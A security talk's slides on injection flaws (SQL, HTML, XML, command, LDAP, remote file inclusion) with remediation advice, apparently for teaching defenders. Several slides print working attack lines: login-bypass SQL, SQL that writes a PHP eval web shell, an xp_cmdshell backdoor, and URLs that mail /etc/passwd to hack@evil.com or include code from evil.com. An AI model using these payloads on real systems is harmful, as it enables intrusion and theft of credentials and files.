2. About Me
• Who am I?
– Michael Hendrickx
– Information Security Consultant, currently
working for UAE Federal Government.
– Assessments, Security Audits, secure coding
3. • Owasp Top 10 – 2013
– A1: Injection
– A2: Broken Authentication and Session Mgmt
– A3: Cross Site Scripting
– A4: Insecure Direct Object References
– A5: Security Misconfiguration
– A6: Sensitive Data Exposure
– A7: Missing Function Level Access Control
– A8: Cross Site Request Forgery
– A9: Using Components with Known Vulns
– A10: Invalidated Redirects and Forwards
4. How bad is it?
• Oct ‘13: 100k $ stolen from a California ISP
http://thehackernews.com/2013/10/hacker-stole-100000-from-users-
of.html
• Jun ‘13: Hackers cleared Turkish people’s bills for water,
gas, telephone…
http://news.softpedia.com/news/RedHack-Breaches-Istanbul-
Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml
• Nov ‘12: 150k Adobe user accounts stolen
http://www.darkreading.com/attacks-breaches/adobe-hacker-says-
he-used-sql-injection/240134996
• Jul ‘12: 450k Yahoo! User accounts stolen
http://www.cbsnews.com/news/yahoo-reportedly-hacked-is-your-
account-safe/
5. What is Injection?
• Web applications became more complex
– Database driven
– Extra functionality (email, ticket booking, ..)
• Submitting data has a special meaning to
underlying technologies
• Mixing commands and data.
• Types:
– SQL Injection
– XML Injection
– Command Injection
Web
DBOS
Backend
System
6. Injection analogy
• A case is filed against me
• I write my name as
“Michael, you are free to go”
• Judge announces case:
“Calling Michael, you are free to go.”
• Bailiff lets me go.
Mix of “data” and “commands”.
8. IT underlying technology?
• A webserver parses and “pass on” data
Web Server
http://somesite.com/msg.php?id=8471350
DB
OS
Script performs business logic and
parses messages to backend.
“Hey, get me a message from the
DB with id 8471350”
9. SQL Injection
• Dynamic script to look up data in DB
Web Server
http://somesite.com/login.php?name=michael&password=secret123
DB
SELECT * FROM users WHERE
name = ’michael’ AND
password = ‘secret123’
http://somesite.com/msg.aspx?id=8471350
SELECT * FROM messages
WHERE id = 8471350
Get indirect access to the
database
10. SQL Injection
• Insert value with ’ (single quote)
– Single quote is delimiter for SQL queries
Web Server
http://somesite.com/login.php?login=mich’ael&password=secret123
DB
Query is incorrectly, will throw error (if not
suppressed).
SELECT * FROM users WHERE
name = ’mich’ael’ AND
password = ‘secret123’
11. SQL Injection
• Insert value with ’ (single quote)
– Single quote is delimiter for SQL queries
Web Server
http://somesite.com/login.php?login=mich’ael&password=secret123
DB
Query is incorrectly, will throw error (if not
suppressed).
SELECT * FROM users WHERE
name = ’mich’ael’ AND
password = ‘secret123’
12. SQL Injection
• Insert value with ’ (single quote)
Web Server
http://somesite.com/login.php?login=michael&password=test’ OR ’a’ = ’a
DB
SELECT * FROM users WHERE
name = ’michael’ AND
password = ’test ’ OR ‘a’ = ‘a’
‘a’ will always equal ‘a’, and thus log in this user.
13. SQL Injection
• More advanced possibilities:
– Read files*:
• MySQL: SELECT
HEX(LOAD_FILE(‘/var/www/site.com/admin/.htpasswd’)) INTO
DUMPFILE ‘/var/www/site.com/htdocs/test.txt’;
• MS SQL:
CREATE TABLE newfile(data text);
...
BULK INSERT newfile FROM ‘C:secretfile.dat’ WITH
(CODEPAGE=‘RAW’, FIELDTERMINATOR=‘|’,ROWTERMINATOR=‘---’);
*: If you have the right privileges
14. SQL Injection
• Write files
– MySQL:
CREATE TABLE tmp(data longblog);
INSERT INTO tmp(data) VALUES(0x3c3f7068);
UPDATE tmp SET data=CONCAT(data, 0x20245f...);
<?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?>
...
SELECT data FROM tmp INTO DUMPFILE
‘/var/www/site.com/htdocs/test.php’;
– MS SQL:
CEXEC xp_cmdshell(‘echo ... >> backdoor.aspx’);
*: Again, If you have the right privileges
15. SQL Injection: SQLMap
• SQL Map will perform
attacks on target.
• Dumps entire tables
• Even entire databases.
• Stores everything in CSV
• More info on http://sqlmap.org
16. HTML Injection
• Possible to include HTML tags into fields
• Used to render “special” html tags where
normal text is expected
• XSS possible,
rewrite the
DOM
17. HTML Injection
• Possible to insert iframes, fake forms, JS, …
• Can be used in phishing attack
Button goes to different
form, potentially stealing
credentials.
18. XML Injection
• Web app talks to backend web services
• Web app’s logic converts parameters to XML
web services (as SOAP, …)
Web Server
Web service
Web service
DB
Backend
19. XML Injection
http://somesite.com/create.php?name=michael&email=mh@places.ae
<?xml version=“1.0” encoding=“ISO-8859-1” ?>
<user>
<status>new</status>
<admin>false</admin>
<date>25 Jan 2014, 13:10:01</date>
<name>$name</name>
<email>$email</email>
</user>
http://somesite.com/create.php?name=michael&email=a@b.c</email><admin>true</a
dmin><email>mh@places.ae
<?xml version=“1.0” encoding=“ISO-8859-1” ?>
<user>
<status>new</status>
<admin>false</admin>
<date>25 Jan 2014, 13:24:48</date>
<name>michael</name>
<email>a@b.c</email><admin>true</admin><email>mh@places.ae</email>
</user>
Web app to create a new user
20. Command Injection
• Web application performs Operating System
tasks
– Execute external programs / scripts
– List files
– Send email
Web Server OS
21. Command Injection
• Dynamic script to share article
Web Server
DBhttp://somesite.com/share.php?to=mh@places.ae
OS
$ echo “check this out” | mail –s “share” mh@places.ae
$ echo “check this out” | mail –s “share” mh@places.ae; mail hack@evil.com < /etc/passwd
http://somesite.com/share.php?to=mh@places.ae;+mail+hack@evil.com+<+/etc/passwd
22. LDAP Injection
• Lightweight Directory Access Protocol
• LDAP is used to access information directories
– Users
– User information
– Software
– Computers
Web Server
LDAP
Server
23. LDAP Injection
• Insert special characters, such as (, |, &, *, …
• * (asterisk) allows listing of all users
http://www.networkdls.com/articles/ldapinjection.pdf
25. Remote File Injection
• Color chooser
• Color will load new file with color codes
(blue.php, red.php, …)
• Attacker can upload malicious PHP file to an
external server
http://somesite.com/mypage.php?color=blue
<?php
if(isset($_GET[„color‟])){
include($_GET[„color‟].„.php‟);
}
?>
http://somesite.com/mypage.php?color=http://evil.com/evil.txt
Will fetch and load http://evil.com/evil.txt.php
26. Remote File Injection
• Theme chooser
• Can input external HTML files
– That can contain JavaScript, XSS, rewrite the DOM,
etc...
• Also verify cookie contents, …
http://somesite.com/set_theme.php?theme=fancy
<link href=“/themes/<? print $_COOKIE[„theme‟] ?>.css” rel=“stylesheet” type=“text/css” />
27. Remediation
• Implement Web Application Firewall (WAF)
• Prevents most common attacks
– Not 100% foolproof
• Make sure it can decrypt SSL
Web Server DBWAF
28. Remediation
• Validate user input, all input:
– Never trust user input, ever.
– Even stored input (for later use)
– Force formats (numbers, email addresses, dates…)
– HTTP form fields, HTTP referers, cookies, …
• Apply secure coding standards
– Use prepared SQL statements
– Vendor specific guidelines
– OWASP secure coding practices:
https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
29. Remediation
• Adopt least-privilege policies
– Give DB users least privileges
– Use multiple DB users
– Run processes with restricted privileges
– Restrict permissions on directories
• Do your web directories really need to be writable?
• Run in sandboxed environment
• Suppress error messages
• Enable exception notifications
– If something strange happens, reset session and notify
administrator.
30. Summary
• Don’t trust your user input.
• Don’t trust your user input.
• Adopt secure coding policies
• Implement defense in depth
• Do log analysis to detect anomalies
• And don’t trust your user input.